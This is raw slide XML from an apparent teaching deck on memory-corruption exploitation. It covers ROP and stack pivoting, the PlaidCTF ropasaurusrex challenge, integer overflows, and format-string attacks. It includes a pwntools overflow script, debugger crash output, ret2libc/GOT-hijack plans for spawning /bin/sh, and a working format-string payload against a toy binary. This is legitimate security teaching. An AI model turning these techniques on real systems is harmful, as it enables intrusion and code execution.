          <a:xfrm rot="10800000">
            <a:off x="7694875" y="2083144"/>
            <a:ext cx="3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7" name="Shape 1917"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3873225" y="1953963"/>
            <a:ext cx="2250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esp = new stack addr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ebp = new ebp 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Shape 19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pivot: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1923" name="Shape 1923"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123525" y="3428375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ebp ret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1924" name="Shape 1924"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="3563750"/>
            <a:ext cx="22503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 ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1925" name="Shape 1925"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1923" idx="1"/>
            <a:endCxn id="1924" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4796025" y="3714725"/>
            <a:ext cx="13275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6" name="Shape 1926"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047380" y="1499315"/>
            <a:ext cx="636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927" name="Shape 1927"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720330" y="1652915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8" name="Shape 1928"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="4362725"/>
            <a:ext cx="22503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 overflow; ret;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29" name="Shape 1929"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1928" idx="0"/>
            <a:endCxn id="1924" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3670775" y="3871025"/>
            <a:ext cx="0" cy="4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0" name="Shape 1930"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704625" y="2400552"/>
            <a:ext cx="1571400" cy="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mov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esp, ebp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pop   ebp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1" name="Shape 1931"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545350" y="2449152"/>
            <a:ext cx="22503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leave ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1932" name="Shape 1932"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="2316402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ret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1933" name="Shape 1933"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1924" idx="0"/>
            <a:endCxn id="1931" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3670475" y="2756450"/>
            <a:ext cx="300" cy="8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4" name="Shape 1934"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1932" idx="1"/>
            <a:endCxn id="1931" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4795675" y="2602752"/>
            <a:ext cx="1327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5" name="Shape 1935"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400325" y="2488752"/>
            <a:ext cx="93300" cy="21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Shape 1936"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="2865075"/>
            <a:ext cx="15714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stack addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1937" name="Shape 1937"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833225" y="2956525"/>
            <a:ext cx="2250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ebp = new stack addr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38" name="Shape 1938"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1931" idx="0"/>
            <a:endCxn id="1939" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3670500" y="1737552"/>
            <a:ext cx="300" cy="7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0" name="Shape 1940"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1866550"/>
            <a:ext cx="1571400" cy="21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ebp value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1939" name="Shape 1939"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="1333150"/>
            <a:ext cx="2250300" cy="404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ROP payload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1" name="Shape 1941"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1430950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942" name="Shape 1942"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667000" y="1249000"/>
            <a:ext cx="404400" cy="572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3" name="Shape 1943"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1942" idx="1"/>
            <a:endCxn id="1939" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4795800" y="1535350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4" name="Shape 1944"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123525" y="1648750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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1945" name="Shape 1945"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1224338"/>
            <a:ext cx="1571400" cy="21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N</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1946" name="Shape 1946"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8067600" y="1623544"/>
            <a:ext cx="6366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stack addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1947" name="Shape 1947"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7694875" y="2083144"/>
            <a:ext cx="3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8" name="Shape 1948"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3873225" y="1953963"/>
            <a:ext cx="2250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esp = new stack addr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ebp = new ebp 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Shape 19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ropasaurusrex (PlaidCTF 2013)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1954" name="Shape 1954"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404425" y="1368825"/>
            <a:ext cx="3681300" cy="288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int __cdecl main()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stack_overflow();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return write(1, "WIN\n", 4u);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ssize_t stack_overflow()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char buf; // [sp+10h] </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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[bp-88h]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@1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return read(0, &amp;buf, 0x100u);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5" name="Shape 1955"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4365750" y="1379200"/>
            <a:ext cx="4324200" cy="115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socat TCP-LISTEN:1337,reuseaddr,fork exec:./ropasaurusrex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6" name="Shape 1956"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4365750" y="2891775"/>
            <a:ext cx="4324200" cy="135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nc 127.0.0.1 1337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AAAAAAAAAAAAAAAAAAAAAAAAAA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WIN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Shape 19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EIP Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1962" name="Shape 1962"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591100" y="1379200"/>
            <a:ext cx="8047200" cy="350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pwn import *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context(arch='i386', os='linux', endian='little', log_level='debug')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elf = ELF('./ropasaurusrex')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 = process(elf.path)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print '[+] PID: %s' % proc.pidof(p)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payload = 'A' * (0x88 + 4) + 'BBBB'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p.send(payload)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p.interactive()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Shape 19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EIP Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1968" name="Shape 1968"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522600" y="1130325"/>
            <a:ext cx="8098800" cy="376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Thread 1 "ropasaurusrex" received signal SIGSEGV, Segmentation fault.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[----------------------------------registers-----------------------------------]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EAX: 0x90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EBX: 0x0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ECX: 0xffed5320 ('A' &lt;repeats 140 times&gt;, "BBBB\334Cx\367\350\201\004\bk\204\004\b")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EDX: 0x100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ESI: 0xf7784000 --&gt; 0x1b1db0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EDI: 0xf7784000 --&gt; 0x1b1db0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EBP: 0x41414141 ('AAAA')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ESP: 0xffed53b0 --&gt; 0xf77843dc --&gt; 0xf77851e0 --&gt; 0x0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EIP: 0x42424242 ('BBBB')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EFLAGS: 0x10213 (CARRY parity ADJUST zero sign trap INTERRUPT direction overflow)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[-------------------------------------code-------------------------------------]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Invalid $PC address: 0x42424242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[------------------------------------stack-------------------------------------]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0000| 0xffed53b0 --&gt; 0xf77843dc --&gt; 0xf77851e0 --&gt; 0x0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[------------------------------------------------------------------------------]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Legend: code, data, rodata, value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Stopped reason: SIGSEGV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0x42424242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in ?? ()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 Instructions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Shape 19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 twice</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1974" name="Shape 19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Leak libc address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write(1, write_got, 4)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calculate system() and address of string '/bin/sh'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Return to main and trigger stack overflow again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ROP to call system('/bin/sh')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Shape 19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hijack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1980" name="Shape 19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 libc address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write(1, write_got, 4)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calculate system() addr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overwrite GOT of write()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read(0, write_got, 4)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read command("/bin/sh") string into .bss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read(0, bss, len(cmd))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PLT of write() to run system(cmd)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRP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write(cmd)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Shape 19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pivot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1986" name="Shape 19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Leak libc address</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRP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write(1, write_got, 4)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calculate system() and address of string '/bin/sh'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Read second stage ROP payload into bss(new stack)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read(0, new_stack, ROP_len)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second stage ROP payload is system('/bin/sh')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 stack pivot and run second stage ROP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'pop ebp ret' + 'leave ret'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Shape 19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DynElf(no libc needed)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1992" name="Shape 19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general memory leak function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 to main to trigger memory leak multiple times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 leak function to DynElf to resolve "system"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command string to .bss section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read(0, bss, len(cmd)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ROP to call system('/bin/sh')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DynElf is useful when libc is unknown</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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DynElf is in pwntools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Shape 19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x64 ROP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1998" name="Shape 19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gadgets to pass arguments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pop rdi ; ret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pop rsi ; pop r15 ; ret  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setting rdx and rcx is hard, no trivial gadgets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Shape 20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__libc_csu_init Gadgets for x64</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2004" name="Shape 20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0" y="1442200"/>
            <a:ext cx="8357150" cy="32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5" name="Shape 2005"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3671596" y="1616959"/>
            <a:ext cx="2765400" cy="70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Shape 2006"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3671596" y="3336133"/>
            <a:ext cx="2765400" cy="117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Shape 20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ROP?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2012" name="Shape 2012"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3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Position Independent Code(PIE)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Code is randomized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First introduced by Pax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more easy ROP and return to PLT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Bypass</a:t>
            </a:r>
            <a:endParaRPr sz="18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Info leak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Heap spray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Brute force on x86_32</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr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memory addresses are randomized at page level - 0x1000 bytes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Info leak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Long nop sled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Heap spray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Shape 20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Stop GOT Hijacking?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2018" name="Shape 20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Relocation Read Only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Compile option: gcc -z,relro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 external functions will be resolved before entering main()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GOT table will be marked read only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Bypass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Hijack GOTs in shared library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Overwrite return address or function pointers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Shape 20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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2024" name="Shape 20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European Space Agency spacecraft Cluster I's satellites exploded because of integer overflow (1996)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M. Dowd, C. Spencer, N. Metha, N. Herath, and H. Flake. Advanced Software Vulnerability Assessment. In Blackhat USA, August 2002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IO2BO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Array index out of bounds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5" name="Shape 2025"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613825" y="3278000"/>
            <a:ext cx="3927900" cy="1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safe_memcpy(char *src, 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size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dst[512];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512)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memcpy(dst, src, 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6" name="Shape 2026"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4918650" y="3281450"/>
            <a:ext cx="36045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safe_set_element(char *arr, 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index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char value, int arr_size)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arr_size)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arr[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value;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7" name="Shape 2027"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871300" y="3056600"/>
            <a:ext cx="1152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IO2BO</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2028" name="Shape 2028"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5028900" y="3056600"/>
            <a:ext cx="1765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index OOB</a:t>
            </a:r>
            <a:endParaRPr b="1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Shape 20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 in Linux kernel</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2034" name="Shape 2034"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404425" y="1381075"/>
            <a:ext cx="4562700" cy="309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CVE-2013-1763 Linux Kernel netlink message family number overflow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net/core/sock_diag.c View file @ 6e601a5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@@ -121,6 +121,9 @@ static int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__sock_diag_rcv_msg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(struct sk_buff *skb, struct nlmsghdr *nlh)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if (nlmsg_len(nlh) &lt; sizeof(*req))</a:t>
            </a:r>
            <a:endParaRPr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return -EINVAL;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+  if (req-&gt;sdiag_family &gt;= AF_MAX)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+    return -EINVAL;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hndl = sock_diag_lock_handler(req-&gt;sdiag_family);</a:t>
            </a:r>
            <a:endParaRPr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(hndl == NULL)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err = -ENOENT;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else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 = hndl-&gt;dump(skb, nlh);</a:t>
            </a:r>
            <a:endParaRPr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5" name="Shape 2035"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5019000" y="1381075"/>
            <a:ext cx="3813300" cy="309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 const inline struct sock_diag_handler *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sock_diag_lock_handler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family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if (sock_diag_handlers[family] == NULL)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	request_module("net-pf-%d-proto-%d-type-%d", PF_NETLINK,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NETLINK_SOCK_DIAG, family);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mutex_lock(&amp;sock_diag_table_mutex);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return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sock_diag_handlers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family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mov &lt;reg&gt;,&lt;reg&gt;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mov &lt;reg&gt;,&lt;mem&gt;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mov &lt;mem&gt;,&lt;reg&gt;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mov &lt;reg&gt;,&lt;const&gt;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mov &lt;mem&gt;,&lt;const&gt;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Examples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mov eax, ebx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mov byte ptr [var], 5 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Shape 20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 Quiz</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2041" name="Shape 2041"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3896900" y="3108700"/>
            <a:ext cx="4735800" cy="17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int test(short param, int value) {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int * mybuf = (int *)malloc(65536 * sizeof(int));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if (param &lt; 0) {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param = -param;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mybuf[param] = value;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return mybuf; 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2" name="Shape 2042"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="72918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Integer Overflow vulnerability can be regarded as some kind of logic bug.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Integer overflow itself cannot be exploited, it is usually used to trigger buffer overflow/heap overflow or used with ROP, ret2libc, etc.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043" name="Shape 2043"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575050" y="3108700"/>
            <a:ext cx="2691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Quiz: can you find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the vuln?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Shape 20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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="Shape 2049"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="134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Discovered and public since June 1999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Shocked the security community in the second half of 2000(influenced lots of programs)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Format String Attacks, Newsham (2001)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use %x and %n to achieve arbitrary read and write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hape 20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 Discovered(year2000)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2055" name="Shape 20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25" y="1238600"/>
            <a:ext cx="8353550" cy="36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Shape 20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related Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2061" name="Shape 20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fprintf — prints to a FILE stream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printf — prints to the ‘stdout’ stream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sprintf — prints into a string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snprintf — prints into a string with length checking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vfprintf — print to a FILE stream from a va_arg structure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vprintf — prints to ‘stdout’ from a va_arg structure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vsprintf — prints to a string from a va_arg structure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vsnprintf — prints to a string with length checking from a va_arg structure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setproctitle — set argv[]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syslog — output to the syslog facility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syntax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2067" name="Shape 20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"/>
              <a:t>  print null terminated string pointed by arg pointer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%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  print hex value of the arg (arbitrary read)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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  store the bytes_written to location pointed by arg pointer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%hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - store 2 bytes (short integer)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%hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - store 1 byte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%&lt;positive integer&gt;c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  print arbitrary count of chars controlled by integer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%123c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (filled by space)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%0512c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(filled by 0)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Useful to change bytes_written so far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-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%&lt;positive integer&gt;$&lt;fmt&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>specify arg index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Example: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%12$n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Shape 20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Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2073" name="Shape 2073"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591100" y="1379200"/>
            <a:ext cx="8047200" cy="350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1 #include &lt;stdio.h&gt;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2 #include &lt;string.h&gt;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3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4 int flag = 0;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5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6 int main(int argc, char **argv) {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7 	char buf[1024];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8 	if (argc &lt; 2) return 1;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9 	strncpy(buf, argv[1], min(sizeof(buf) - 1, 1024));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10 	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printf(buf);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11 	printf("\n");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12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13 	if (flag == 0x13371337) {		//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How to win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14     	printf("You Win!\n");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15 	}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17 	return 0;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18 }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Shape 20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Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2079" name="Shape 2079"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591100" y="1379200"/>
            <a:ext cx="8047200" cy="350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$ ./fmt %x:%x:%x:%x:%x:%x</a:t>
            </a:r>
            <a:endParaRPr sz="18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ffffda9c:3ff:1b1ea4:253a7825:78253a78:3a78253a</a:t>
            </a:r>
            <a:endParaRPr sz="18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$ ./fmt %s:%s:%s:%s:%s:%s</a:t>
            </a:r>
            <a:endParaRPr sz="18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Segmentation fault (core dumped)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Shape 20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Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2085" name="Shape 2085"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950425" y="1698825"/>
            <a:ext cx="1948800" cy="535200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5B9B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%4911x%7$hn%65536x%8$hn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6" name="Shape 2086"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950425" y="2234025"/>
            <a:ext cx="1948800" cy="431100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5B9B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0x804a036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7" name="Shape 2087"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950425" y="2665125"/>
            <a:ext cx="1948800" cy="383100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5B9B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0x804a034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8" name="Shape 2088"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950425" y="3050125"/>
            <a:ext cx="1948800" cy="383100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CEDFB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9" name="Shape 2089"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950425" y="3433225"/>
            <a:ext cx="1948800" cy="383100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CEDFB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Fmt str pointer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0" name="Shape 2090"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391350" y="1237950"/>
            <a:ext cx="974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Addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2091" name="Shape 2091"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391350" y="3881425"/>
            <a:ext cx="974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Addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2092" name="Shape 2092"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3338475" y="1379200"/>
            <a:ext cx="5299800" cy="350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1 #include &lt;stdio.h&gt;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2 #include &lt;string.h&gt;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3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4 int flag = 0;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5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6 int main(int argc, char **argv) {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7 	char buf[1024];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8 	if (argc &lt; 2) return 1;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9 	strncpy(buf, argv[1], min(sizeof(buf) - 1, 1024));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10 	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printf(buf);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11 	printf("\n");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12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13 	if (flag == 0x13371337) {		//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How to win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14     	printf("You Win!\n");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15 	}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17 	return 0;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18 }</a:t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Shape 20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Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2098" name="Shape 2098"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591100" y="1379200"/>
            <a:ext cx="8047200" cy="350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./fmt $(python2 -c 'print "\x34\xa0\x04\x08\x36\xa0\x04\x08%4911x%7$hn%65536x%8$hn"')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You Win!</a:t>
            </a:r>
            <a:endParaRPr b="1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9" name="Shape 2099"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2867250" y="2579725"/>
            <a:ext cx="2691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How to execute </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="FFFF00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arbitrary code?</a:t>
            </a:r>
            <a:endParaRPr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Shape 2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Code Exec</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
